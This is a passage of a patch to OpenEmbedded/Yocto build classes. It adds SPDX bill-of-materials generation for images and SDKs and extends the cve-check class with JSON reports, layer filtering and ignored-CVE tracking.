+do_create_runtime_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
+
+python do_create_runtime_spdx_setscene () {
+    sstate_setscene(d)
+}
+addtask do_create_runtime_spdx_setscene
+
+do_create_runtime_spdx[dirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[cleandirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[rdeptask] = "do_create_spdx"
+
+def spdx_get_src(d):
+    """
+    save patched source of the recipe in SPDX_WORKDIR.
+    """
+    import shutil
+    spdx_workdir = d.getVar('SPDXWORK')
+    spdx_sysroot_native = d.getVar('STAGING_DIR_NATIVE')
+    pn = d.getVar('PN')
+
+    workdir = d.getVar("WORKDIR")
+
+    try:
+        # The kernel class functions require it to be on work-shared, so we dont change WORKDIR
+        if not is_work_shared_spdx(d):
+            # Change the WORKDIR to make do_unpack do_patch run in another dir.
+            d.setVar('WORKDIR', spdx_workdir)
+            # Restore the original path to recipe's native sysroot (it's relative to WORKDIR).
+            d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
+
+            # The changed 'WORKDIR' also caused 'B' changed, create dir 'B' for the
+            # possibly requiring of the following tasks (such as some recipes's
+            # do_patch required 'B' existed).
+            bb.utils.mkdirhier(d.getVar('B'))
+
+            bb.build.exec_func('do_unpack', d)
+        # Copy source of kernel to spdx_workdir
+        if is_work_shared_spdx(d):
+            share_src = d.getVar('WORKDIR')
+            d.setVar('WORKDIR', spdx_workdir)
+            d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
+            src_dir = spdx_workdir + "/" + d.getVar('PN')+ "-" + d.getVar('PV') + "-" + d.getVar('PR')
+            bb.utils.mkdirhier(src_dir)
+            if bb.data.inherits_class('kernel',d):
+                share_src = d.getVar('STAGING_KERNEL_DIR')
+            cmd_copy_share = "cp -rf " + share_src + "/* " + src_dir + "/"
+            cmd_copy_shared_res = os.popen(cmd_copy_share).read()
+            bb.note("cmd_copy_shared_result = " + cmd_copy_shared_res)
+
+            git_path = src_dir + "/.git"
+            if os.path.exists(git_path):
+                shutils.rmtree(git_path)
+
+        # Make sure gcc and kernel sources are patched only once
+        if not (d.getVar('SRC_URI') == "" or is_work_shared_spdx(d)):
+            bb.build.exec_func('do_patch', d)
+
+        # Some userland has no source.
+        if not os.path.exists( spdx_workdir ):
+            bb.utils.mkdirhier(spdx_workdir)
+    finally:
+        d.setVar("WORKDIR", workdir)
+
+do_rootfs[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
+do_rootfs[cleandirs] += "${SPDXIMAGEWORK}"
+
+ROOTFS_POSTUNINSTALL_COMMAND =+ "image_combine_spdx ; "
+
+do_populate_sdk[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
+do_populate_sdk[cleandirs] += "${SPDXSDKWORK}"
+POPULATE_SDK_POST_HOST_COMMAND:append:task-populate-sdk = " sdk_host_combine_spdx; "
+POPULATE_SDK_POST_TARGET_COMMAND:append:task-populate-sdk = " sdk_target_combine_spdx; "
+
+python image_combine_spdx() {
+    import os
+    import oe.sbom
+    from pathlib import Path
+    from oe.rootfs import image_list_installed_packages
+
+    image_name = d.getVar("IMAGE_NAME")
+    image_link_name = d.getVar("IMAGE_LINK_NAME")
+    imgdeploydir = Path(d.getVar("IMGDEPLOYDIR"))
+    img_spdxid = oe.sbom.get_image_spdxid(image_name)
+    packages = image_list_installed_packages(d)
+
+    combine_spdx(d, image_name, imgdeploydir, img_spdxid, packages, Path(d.getVar("SPDXIMAGEWORK")))
+
+    def make_image_link(target_path, suffix):
+        if image_link_name:
+            link = imgdeploydir / (image_link_name + suffix)
+            if link != target_path:
+                link.symlink_to(os.path.relpath(target_path, link.parent))
+
+    spdx_tar_path = imgdeploydir / (image_name + ".spdx.tar.gz")
+    make_image_link(spdx_tar_path, ".spdx.tar.gz")
+}
+
+python sdk_host_combine_spdx() {
+    sdk_combine_spdx(d, "host")
+}
+
+python sdk_target_combine_spdx() {
+    sdk_combine_spdx(d, "target")
+}
+
+def sdk_combine_spdx(d, sdk_type):
+    import oe.sbom
+    from pathlib import Path
+    from oe.sdk import sdk_list_installed_packages
+
+    sdk_name = d.getVar("SDK_NAME") + "-" + sdk_type
+    sdk_deploydir = Path(d.getVar("SDKDEPLOYDIR"))
+    sdk_spdxid = oe.sbom.get_sdk_spdxid(sdk_name)
+    sdk_packages = sdk_list_installed_packages(d, sdk_type == "target")
+    combine_spdx(d, sdk_name, sdk_deploydir, sdk_spdxid, sdk_packages, Path(d.getVar('SPDXSDKWORK')))
+
+def combine_spdx(d, rootfs_name, rootfs_deploydir, rootfs_spdxid, packages, spdx_workdir):
+    import os
+    import oe.spdx
+    import oe.sbom
+    import io
+    import json
+    from datetime import timezone, datetime
+    from pathlib import Path
+    import tarfile
+    import gzip
+
+    creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+    deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+    source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
+
+    doc = oe.spdx.SPDXDocument()
+    doc.name = rootfs_name
+    doc.documentNamespace = get_doc_namespace(d, doc)
+    doc.creationInfo.created = creation_time
+    doc.creationInfo.comment = "This document was created by analyzing the source of the Yocto recipe during the build."
+    doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+    doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+    doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+    doc.creationInfo.creators.append("Person: N/A ()")
+
+    image = oe.spdx.SPDXPackage()
+    image.name = d.getVar("PN")
+    image.versionInfo = d.getVar("PV")
+    image.SPDXID = rootfs_spdxid
+    image.supplier = d.getVar("SPDX_SUPPLIER")
+
+    doc.packages.append(image)
+
+    for name in sorted(packages.keys()):
+        pkg_spdx_path = deploy_dir_spdx / "packages" / (name + ".spdx.json")
+        pkg_doc, pkg_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
+
+        for p in pkg_doc.packages:
+            if p.name == name:
+                pkg_ref = oe.spdx.SPDXExternalDocumentRef()
+                pkg_ref.externalDocumentId = "DocumentRef-%s" % pkg_doc.name
+                pkg_ref.spdxDocument = pkg_doc.documentNamespace
+                pkg_ref.checksum.algorithm = "SHA1"
+                pkg_ref.checksum.checksumValue = pkg_doc_sha1
+
+                doc.externalDocumentRefs.append(pkg_ref)
+                doc.add_relationship(image, "CONTAINS", "%s:%s" % (pkg_ref.externalDocumentId, p.SPDXID))
+                break
+        else:
+            bb.fatal("Unable to find package with name '%s' in SPDX file %s" % (name, pkg_spdx_path))
+
+        runtime_spdx_path = deploy_dir_spdx / "runtime" / ("runtime-" + name + ".spdx.json")
+        runtime_doc, runtime_doc_sha1 = oe.sbom.read_doc(runtime_spdx_path)
+
+        runtime_ref = oe.spdx.SPDXExternalDocumentRef()
+        runtime_ref.externalDocumentId = "DocumentRef-%s" % runtime_doc.name
+        runtime_ref.spdxDocument = runtime_doc.documentNamespace
+        runtime_ref.checksum.algorithm = "SHA1"
+        runtime_ref.checksum.checksumValue = runtime_doc_sha1
+
+        # "OTHER" isn't ideal here, but I can't find a relationship that makes sense
+        doc.externalDocumentRefs.append(runtime_ref)
+        doc.add_relationship(
+            image,
+            "OTHER",
+            "%s:%s" % (runtime_ref.externalDocumentId, runtime_doc.SPDXID),
+            comment="Runtime dependencies for %s" % name
+        )
+
+    image_spdx_path = spdx_workdir / (rootfs_name + ".spdx.json")
+
+    with image_spdx_path.open("wb") as f:
+        doc.to_json(f, sort_keys=True, indent=get_json_indent(d))
+
+    num_threads = int(d.getVar("BB_NUMBER_THREADS"))
+
+    visited_docs = set()
+
+    index = {"documents": []}
+
+    spdx_tar_path = rootfs_deploydir / (rootfs_name + ".spdx.tar.gz")
+    with gzip.open(spdx_tar_path, "w") as f:
+        with tarfile.open(fileobj=f, mode="w|") as tar:
+            def collect_spdx_document(path):
+                nonlocal tar
+                nonlocal deploy_dir_spdx
+                nonlocal source_date_epoch
+                nonlocal index
+
+                if path in visited_docs:
+                    return
+
+                visited_docs.add(path)
+
+                with path.open("rb") as f:
+                    doc, sha1 = oe.sbom.read_doc(f)
+                    f.seek(0)
+
+                    if doc.documentNamespace in visited_docs:
+                        return
+
+                    bb.note("Adding SPDX document %s" % path)
+                    visited_docs.add(doc.documentNamespace)
+                    info = tar.gettarinfo(fileobj=f)
+
+                    info.name = doc.name + ".spdx.json"
+                    info.uid = 0
+                    info.gid = 0
+                    info.uname = "root"
+                    info.gname = "root"
+
+                    if source_date_epoch is not None and info.mtime > int(source_date_epoch):
+                        info.mtime = int(source_date_epoch)
+
+                    tar.addfile(info, f)
+
+                    index["documents"].append({
+                        "filename": info.name,
+                        "documentNamespace": doc.documentNamespace,
+                        "sha1": sha1,
+                    })
+
+                for ref in doc.externalDocumentRefs:
+                    ref_path = deploy_dir_spdx / "by-namespace" / ref.spdxDocument.replace("/", "_")
+                    collect_spdx_document(ref_path)
+
+            collect_spdx_document(image_spdx_path)
+
+            index["documents"].sort(key=lambda x: x["filename"])
+
+            index_str = io.BytesIO(json.dumps(
+                index,
+                sort_keys=True,
+                indent=get_json_indent(d),
+            ).encode("utf-8"))
+
+            info = tarfile.TarInfo()
+            info.name = "index.json"
+            info.size = len(index_str.getvalue())
+            info.uid = 0
+            info.gid = 0
+            info.uname = "root"
+            info.gname = "root"
+
+            tar.addfile(info, fileobj=index_str)
diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass
new file mode 100644
index 0000000000..19c6c0ff0b
--- /dev/null
+++ b/meta/classes/create-spdx.bbclass
@@ -0,0 +1,8 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+# Include this class when you don't care what version of SPDX you get; it will
+# be updated to the latest stable version that is supported
+inherit create-spdx-2.2
diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 17f64a8a9c..5e6bae1757 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -20,13 +20,13 @@
 # the only method to check against CVEs. Running this tool
 # doesn't guarantee your packages are free of CVEs.
 
-# The product name that the CVE database uses.  Defaults to BPN, but may need to
+# The product name that the CVE database uses defaults to BPN, but may need to
 # be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
 CVE_PRODUCT ??= "${BPN}"
 CVE_VERSION ??= "${PV}"
 
 CVE_CHECK_DB_DIR ?= "${DL_DIR}/CVE_CHECK"
-CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_1.1.db"
+CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_2.db"
 CVE_CHECK_DB_FILE_LOCK ?= "${CVE_CHECK_DB_FILE}.lock"
 
 CVE_CHECK_LOG ?= "${T}/cve.log"
@@ -34,25 +34,80 @@ CVE_CHECK_TMP_FILE ?= "${TMPDIR}/cve_check"
 CVE_CHECK_SUMMARY_DIR ?= "${LOG_DIR}/cve"
 CVE_CHECK_SUMMARY_FILE_NAME ?= "cve-summary"
 CVE_CHECK_SUMMARY_FILE ?= "${CVE_CHECK_SUMMARY_DIR}/${CVE_CHECK_SUMMARY_FILE_NAME}"
+CVE_CHECK_SUMMARY_FILE_NAME_JSON = "cve-summary.json"
+CVE_CHECK_SUMMARY_INDEX_PATH = "${CVE_CHECK_SUMMARY_DIR}/cve-summary-index.txt"
+
+CVE_CHECK_LOG_JSON ?= "${T}/cve.json"
 
 CVE_CHECK_DIR ??= "${DEPLOY_DIR}/cve"
-CVE_CHECK_MANIFEST ?= "${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
+CVE_CHECK_RECIPE_FILE ?= "${CVE_CHECK_DIR}/${PN}"
+CVE_CHECK_RECIPE_FILE_JSON ?= "${CVE_CHECK_DIR}/${PN}_cve.json"
+CVE_CHECK_MANIFEST ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
+CVE_CHECK_MANIFEST_JSON ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.json"
 CVE_CHECK_COPY_FILES ??= "1"
 CVE_CHECK_CREATE_MANIFEST ??= "1"
 
+# Report Patched or Ignored/Whitelisted CVEs
+CVE_CHECK_REPORT_PATCHED ??= "1"
+
+CVE_CHECK_SHOW_WARNINGS ??= "1"
+
+# Provide text output
+CVE_CHECK_FORMAT_TEXT ??= "1"
+
+# Provide JSON output - disabled by default for backward compatibility
+CVE_CHECK_FORMAT_JSON ??= "0"
+
+# Check for packages without CVEs (no issues or missing product name)
+CVE_CHECK_COVERAGE ??= "1"
+
 # Whitelist for packages (PN)
 CVE_CHECK_PN_WHITELIST ?= ""
 
 # Whitelist for CVE. If a CVE is found, then it is considered patched.
 # The value is a string containing space separated CVE values:
-# 
+#
 # CVE_CHECK_WHITELIST = 'CVE-2014-2524 CVE-2018-1234'
-# 
+#
 CVE_CHECK_WHITELIST ?= ""
 
+# Layers to be excluded
+CVE_CHECK_LAYER_EXCLUDELIST ??= ""
+
+# Layers to be included
+CVE_CHECK_LAYER_INCLUDELIST ??= ""
+
+
+# set to "alphabetical" for version using single alphabetical character as increment release
+CVE_VERSION_SUFFIX ??= ""
+
+def generate_json_report(d, out_path, link_path):
+    if os.path.exists(d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")):
+        import json
+        from oe.cve_check import cve_check_merge_jsons, update_symlinks
+
+        bb.note("Generating JSON CVE summary")
+        index_file = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
+        summary = {"version":"1", "package": []}
+        with open(index_file) as f:
+            filename = f.readline()
+            while filename:
+                with open(filename.rstrip()) as j:
+                    data = json.load(j)
+                    cve_check_merge_jsons(summary, data)
+                filename = f.readline()
+
+        summary["package"].sort(key=lambda d: d['name'])
+
+        with open(out_path, "w") as f:
+            json.dump(summary, f, indent=2)
+
+        update_symlinks(out_path, link_path)
+
 python cve_save_summary_handler () {
     import shutil
     import datetime
+    from oe.cve_check import update_symlinks
 
     cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
 
@@ -65,13 +120,15 @@ python cve_save_summary_handler () {
 
     if os.path.exists(cve_tmp_file):
         shutil.copyfile(cve_tmp_file, cve_summary_file)
-
-        if cve_summary_file and os.path.exists(cve_summary_file):
-            cvefile_link = os.path.join(cvelogpath, cve_summary_name)
-
-            if os.path.exists(os.path.realpath(cvefile_link)):
-                os.remove(cvefile_link)
-            os.symlink(os.path.basename(cve_summary_file), cvefile_link)
+        cvefile_link = os.path.join(cvelogpath, cve_summary_name)
+        update_symlinks(cve_summary_file, cvefile_link)
+        bb.plain("Complete CVE report summary created at: %s" % cvefile_link)
+
+    if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
+        json_summary_link_name = os.path.join(cvelogpath, d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON"))
+        json_summary_name = os.path.join(cvelogpath, "%s-%s.json" % (cve_summary_name, timestamp))
+        generate_json_report(d, json_summary_name, json_summary_link_name)
+        bb.plain("Complete CVE JSON report summary created at: %s" % json_summary_link_name)
 }
 
 addhandler cve_save_summary_handler
@@ -81,23 +138,25 @@ python do_cve_check () {
     """
     Check recipe for patched and unpatched CVEs
     """
+    from oe.cve_check import get_patched_cves
 
-    if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
-        try:
-            patched_cves = get_patches_cves(d)
-        except FileNotFoundError:
-            bb.fatal("Failure in searching patches")
-        whitelisted, patched, unpatched = check_cves(d, patched_cves)
-        if patched or unpatched:
-            cve_data = get_cve_info(d, patched + unpatched)
-            cve_write_data(d, patched, unpatched, whitelisted, cve_data)
-    else:
-        bb.note("No CVE database found, skipping CVE check")
+    with bb.utils.fileslocked([d.getVar("CVE_CHECK_DB_FILE_LOCK")], shared=True):
+        if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
+            try:
+                patched_cves = get_patched_cves(d)
+            except FileNotFoundError:
+                bb.fatal("Failure in searching patches")
+            ignored, patched, unpatched, status = check_cves(d, patched_cves)
+            if patched or unpatched or (d.getVar("CVE_CHECK_COVERAGE") == "1" and status):
+                cve_data = get_cve_info(d, patched + unpatched + ignored)
+                cve_write_data(d, patched, unpatched, ignored, cve_data, status)
+        else:
+            bb.note("No CVE database found, skipping CVE check")
 
 }
 
-addtask cve_check before do_build after do_fetch
-do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db"
+addtask cve_check before do_build
+do_cve_check[depends] = "cve-update-nvd2-native:do_fetch"
 do_cve_check[nostamp] = "1"
 
 python cve_check_cleanup () {
@@ -105,10 +164,11 @@ python cve_check_cleanup () {
     Delete the file used to gather all the CVE information.
     """
     bb.utils.remove(e.data.getVar("CVE_CHECK_TMP_FILE"))
+    bb.utils.remove(e.data.getVar("CVE_CHECK_SUMMARY_INDEX_PATH"))
 }
 
 addhandler cve_check_cleanup
-cve_check_cleanup[eventmask] = "bb.cooker.CookerExit"
+cve_check_cleanup[eventmask] = "bb.event.BuildCompleted"
 
 python cve_check_write_rootfs_manifest () {
     """
@@ -116,111 +176,107 @@ python cve_check_write_rootfs_manifest () {
     """
 
     import shutil
+    import json
+    from oe.rootfs import image_list_installed_packages
+    from oe.cve_check import cve_check_merge_jsons, update_symlinks
 
     if d.getVar("CVE_CHECK_COPY_FILES") == "1":
-        deploy_file = os.path.join(d.getVar("CVE_CHECK_DIR"), d.getVar("PN"))
+        deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
         if os.path.exists(deploy_file):
             bb.utils.remove(deploy_file)
-
-    if os.path.exists(d.getVar("CVE_CHECK_TMP_FILE")):
-        bb.note("Writing rootfs CVE manifest")
-        deploy_dir = d.getVar("DEPLOY_DIR_IMAGE")
-        link_name = d.getVar("IMAGE_LINK_NAME")
+        deploy_file_json = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+        if os.path.exists(deploy_file_json):
+            bb.utils.remove(deploy_file_json)
+
+    # Create a list of relevant recipies
+    recipies = set()
+    for pkg in list(image_list_installed_packages(d)):
+        pkg_info = os.path.join(d.getVar('PKGDATA_DIR'),
+                                'runtime-reverse', pkg)
+        pkg_data = oe.packagedata.read_pkgdatafile(pkg_info)
+        recipies.add(pkg_data["PN"])
+
+    bb.note("Writing rootfs CVE manifest")
+    deploy_dir = d.getVar("IMGDEPLOYDIR")
+    link_name = d.getVar("IMAGE_LINK_NAME")
+
+    json_data = {"version":"1", "package": []}
+    text_data = ""
+    enable_json = d.getVar("CVE_CHECK_FORMAT_JSON") == "1"
+    enable_text = d.getVar("CVE_CHECK_FORMAT_TEXT") == "1"
+
+    save_pn = d.getVar("PN")
+
+    for pkg in recipies:
+        # To be able to use the CVE_CHECK_RECIPE_FILE variable we have to evaluate
+        # it with the different PN names set each time.
+        d.setVar("PN", pkg)
+        if enable_text:
+            pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE")
+            if os.path.exists(pkgfilepath):
+                with open(pkgfilepath) as pfile:
+                    text_data += pfile.read()
+
+        if enable_json:
+            pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+            if os.path.exists(pkgfilepath):
+                with open(pkgfilepath) as j:
+                    data = json.load(j)
+                    cve_check_merge_jsons(json_data, data)
+
+    d.setVar("PN", save_pn)
+
+    if enable_text:
+        link_path = os.path.join(deploy_dir, "%s.cve" % link_name)
         manifest_name = d.getVar("CVE_CHECK_MANIFEST")
-        cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
 
-        shutil.copyfile(cve_tmp_file, manifest_name)
+        with open(manifest_name, "w") as f:
+            f.write(text_data)
 
-        if manifest_name and os.path.exists(manifest_name):
-            manifest_link = os.path.join(deploy_dir, "%s.cve" % link_name)
-            # If we already have another manifest, update symlinks
-            if os.path.exists(os.path.realpath(manifest_link)):
-                os.remove(manifest_link)
-            os.symlink(os.path.basename(manifest_name), manifest_link)
-            bb.plain("Image CVE report stored in: %s" % manifest_name)
-}
+        update_symlinks(manifest_name, link_path)
+        bb.plain("Image CVE report stored in: %s" % manifest_name)
 
-ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
-do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
-
-def get_patches_cves(d):
-    """
-    Get patches that solve CVEs using the "CVE: " tag.
-    """
-
-    import re
+    if enable_json:
+        link_path = os.path.join(deploy_dir, "%s.json" % link_name)
+        manifest_name = d.getVar("CVE_CHECK_MANIFEST_JSON")
 
-    pn = d.getVar("PN")
-    cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
-
-    # Matches last CVE-1234-211432 in the file name, also if written
-    # with small letters. Not supporting multiple CVE id's in a single
-    # file name.
-    cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
-
-    patched_cves = set()
-    bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
-    for url in src_patches(d):
-        patch_file = bb.fetch.decodeurl(url)[2]
-
-        if not os.path.isfile(patch_file):
-            bb.error("File Not found: %s" % patch_file)
-            raise FileNotFoundError
-
-        # Check patch file name for CVE ID
-        fname_match = cve_file_name_match.search(patch_file)
-        if fname_match:
-            cve = fname_match.group(1).upper()
-            patched_cves.add(cve)
-            bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
-
-        with open(patch_file, "r", encoding="utf-8") as f:
-            try:
-                patch_text = f.read()
-            except UnicodeDecodeError:
-                bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
-                        " trying with iso8859-1" %  patch_file)
-                f.close()
-                with open(patch_file, "r", encoding="iso8859-1") as f:
-                    patch_text = f.read()
-
-        # Search for one or more "CVE: " lines
-        text_match = False
-        for match in cve_match.finditer(patch_text):
-            # Get only the CVEs without the "CVE: " tag
-            cves = patch_text[match.start()+5:match.end()]
-            for cve in cves.split():
-                bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
-                patched_cves.add(cve)
-                text_match = True
+        with open(manifest_name, "w") as f:
+            json.dump(json_data, f, indent=2)
 
-        if not fname_match and not text_match:
-            bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+        update_symlinks(manifest_name, link_path)
+        bb.plain("Image CVE JSON report stored in: %s" % manifest_name)
+}
 
-    return patched_cves
+ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
+do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
+do_populate_sdk[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
 
 def check_cves(d, patched_cves):
     """
     Connect to the NVD database and find unpatched cves.
     """
-    from distutils.version import LooseVersion
+    from oe.cve_check import Version, convert_cve_version
+
+    pn = d.getVar("PN")
+    real_pv = d.getVar("PV")
+    suffix = d.getVar("CVE_VERSION_SUFFIX")
 
     cves_unpatched = []
+    cves_ignored = []
+    cves_status = []
+    cves_in_recipe = False
     # CVE_PRODUCT can contain more than one product (eg. curl/libcurl)
     products = d.getVar("CVE_PRODUCT").split()
     # If this has been unset then we're not scanning for CVEs here (for example, image recipes)
     if not products:
-        return ([], [], [])
+        return ([], [], [], [])
     pv = d.getVar("CVE_VERSION").split("+git")[0]
 
-    # If the recipe has been whitlisted we return empty lists
-    if d.getVar("PN") in d.getVar("CVE_CHECK_PN_WHITELIST").split():
+    # If the recipe has been whitelisted we return empty lists
+    if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split():
         bb.note("Recipe has been whitelisted, skipping check")
-        return ([], [], [])
+        return ([], [], [], [])
 
-    old_cve_whitelist =  d.getVar("CVE_CHECK_CVE_WHITELIST")
-    if old_cve_whitelist:
-        bb.warn("CVE_CHECK_CVE_WHITELIST is deprecated, please use CVE_CHECK_WHITELIST.")
     cve_whitelist = d.getVar("CVE_CHECK_WHITELIST").split()
 
     import sqlite3
@@ -229,36 +285,50 @@ def check_cves(d, patched_cves):
 
     # For each of the known product names (e.g. curl has CPEs using curl and libcurl)...
     for product in products:
+        cves_in_product = False
         if ":" in product:
             vendor, product = product.split(":", 1)
         else:
             vendor = "%"
 
         # Find all relevant CVE IDs.
-        for cverow in conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor)):
+        cve_cursor = conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor))
+        for cverow in cve_cursor:
             cve = cverow[0]
 
             if cve in cve_whitelist:
                 bb.note("%s-%s has been whitelisted for %s" % (product, pv, cve))
-                # TODO: this should be in the report as 'whitelisted'
-                patched_cves.add(cve)
+                cves_ignored.append(cve)
                 continue
             elif cve in patched_cves:
                 bb.note("%s has been patched" % (cve))
                 continue
+            # Write status once only for each product
+            if not cves_in_product:
+                cves_status.append([product, True])
+                cves_in_product = True
+                cves_in_recipe = True
 
             vulnerable = False
-            for row in conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor)):
+            ignored = False
+
+            product_cursor = conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor))
+            for row in product_cursor:
                 (_, _, _, version_start, operator_start, version_end, operator_end) = row
                 #bb.debug(2, "Evaluating row " + str(row))
+                if cve in cve_whitelist:
+                    ignored = True
+
+                version_start = convert_cve_version(version_start)
+                version_end = convert_cve_version(version_end)
 
                 if (operator_start == '=' and pv == version_start) or version_start == '-':
                     vulnerable = True
                 else:
                     if operator_start:
                         try:
-                            vulnerable_start =  (operator_start == '>=' and LooseVersion(pv) >= LooseVersion(version_start))
-                            vulnerable_start |= (operator_start == '>' and LooseVersion(pv) > LooseVersion(version_start))
+                            vulnerable_start =  (operator_start == '>=' and Version(pv,suffix) >= Version(version_start,suffix))
+                            vulnerable_start |= (operator_start == '>' and Version(pv,suffix) > Version(version_start,suffix))
                         except:
                             bb.warn("%s: Failed to compare %s %s %s for %s" %
                                     (product, pv, operator_start, version_start, cve))
@@ -268,8 +338,8 @@ def check_cves(d, patched_cves):
 
                     if operator_end:
                         try:
-                            vulnerable_end  = (operator_end == '<=' and LooseVersion(pv) <= LooseVersion(version_end))
-                            vulnerable_end |= (operator_end == '<' and LooseVersion(pv) < LooseVersion(version_end))
+                            vulnerable_end  = (operator_end == '<=' and Version(pv,suffix) <= Version(version_end,suffix) )
+                            vulnerable_end |= (operator_end == '<' and Version(pv,suffix) < Version(version_end,suffix) )
                         except:
                             bb.warn("%s: Failed to compare %s %s %s for %s" %
                                     (product, pv, operator_end, version_end, cve))
@@ -283,18 +353,27 @@ def check_cves(d, patched_cves):
                         vulnerable = vulnerable_start or vulnerable_end
 
                 if vulnerable:
-                    bb.note("%s-%s is vulnerable to %s" % (product, pv, cve))
-                    cves_unpatched.append(cve)
+                    if ignored:
+                        bb.note("%s is ignored in %s-%s" % (cve, pn, real_pv))
+                        cves_ignored.append(cve)
+                    else:
+                        bb.note("%s-%s is vulnerable to %s" % (pn, real_pv, cve))
+                        cves_unpatched.append(cve)
                     break
+            product_cursor.close()
 
             if not vulnerable:
-                bb.note("%s-%s is not vulnerable to %s" % (product, pv, cve))
-                # TODO: not patched but not vulnerable
+                bb.note("%s-%s is not vulnerable to %s" % (pn, real_pv, cve))
                 patched_cves.add(cve)
+        cve_cursor.close()
+
+        if not cves_in_product:
+            bb.note("No CVE records found for product %s, pn %s" % (product, pn))
+            cves_status.append([product, False])
 
     conn.close()
 
-    return (list(cve_whitelist), list(patched_cves), cves_unpatched)
+    return (list(cves_ignored), list(patched_cves), cves_unpatched, cves_status)
 
 def get_cve_info(d, cves):
     """
@@ -304,39 +383,66 @@ def get_cve_info(d, cves):
     import sqlite3
 
     cve_data = {}
-    conn = sqlite3.connect(d.getVar("CVE_CHECK_DB_FILE"))
+    db_file = d.expand("file:${CVE_CHECK_DB_FILE}?mode=ro")
+    conn = sqlite3.connect(db_file, uri=True)
 
     for cve in cves:
-        for row in conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,)):
+        cursor = conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,))
+        for row in cursor:
             cve_data[row[0]] = {}
             cve_data[row[0]]["summary"] = row[1]
             cve_data[row[0]]["scorev2"] = row[2]
             cve_data[row[0]]["scorev3"] = row[3]
             cve_data[row[0]]["modified"] = row[4]
             cve_data[row[0]]["vector"] = row[5]
-
+        cursor.close()
     conn.close()
     return cve_data
 
-def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
+def cve_write_data_text(d, patched, unpatched, whitelisted, cve_data):
     """
     Write CVE information in WORKDIR; and to CVE_CHECK_DIR, and
     CVE manifest if enabled.
     """
 
     cve_file = d.getVar("CVE_CHECK_LOG")
-    nvd_link = "https://web.nvd.nist.gov/view/vuln/detail?vulnId="
+    fdir_name  = d.getVar("FILE_DIRNAME")
+    layer = fdir_name.split("/")[-3]
+
+    include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
+    exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
+
+    report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
+
+    if exclude_layers and layer in exclude_layers:
